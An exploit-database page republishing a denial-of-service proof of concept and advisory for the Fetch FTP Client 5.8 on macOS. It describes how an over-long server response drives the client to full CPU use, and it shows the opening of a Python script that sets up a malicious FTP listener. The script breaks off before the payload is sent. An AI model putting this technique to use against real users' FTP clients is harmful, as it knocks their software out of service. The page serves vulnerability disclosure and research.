Fetch softworks fetch ftp client 5.8 remote cpu consumption (denial of service) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2022-02-02 |
Type : local |
Platform : macos
This exploit / vulnerability Fetch softworks fetch ftp client 5.8 remote cpu consumption (denial of service) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)
# Exploit Author: liquidworm
#!/usr/bin/env python
#
#
# Fetch Softworks Fetch FTP Client 5.8 Remote CPU Consumption (Denial of Service)
#
#
# Vendor: Fetch Softworks
# Product web page: https://www.fetchsoftworks.com
# Affected version: 5.8.2 (5K1354)
#
# Summary: Fetch is a reliable, full-featured file transfer client for the
# Apple Macintosh whose user interface emphasizes simplicity and ease of use.
# Fetch supports FTP and SFTP, the most popular file transfer protocols on
# the Internet for compatibility with thousands of Internet service providers,
# web hosting companies, publishers, pre-press companies, and more.
#
# Desc: The application is prone to a DoS after receiving a long server response
# (more than 2K bytes) leading to 100% CPU consumption.
#
# --------------------------------------------------------------------------------
# ~/Desktop> ps ucp 3498
# USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
# lqwrm 3498 100.0 0.5 60081236 54488 ?? R 5:44PM 4:28.97 Fetch-5K1354-266470421
# ~/Desktop>
# --------------------------------------------------------------------------------
#
# Tested on: macOS Monterey 12.2
# macOS Big Sur 11.6.2
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2022-5696
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5696.php
#
#
# 27.01.2022
#
import socket
host = '0.0.0.0'
port = 21
s = socket.socket()
s.bind((host, port))
s.listen(2)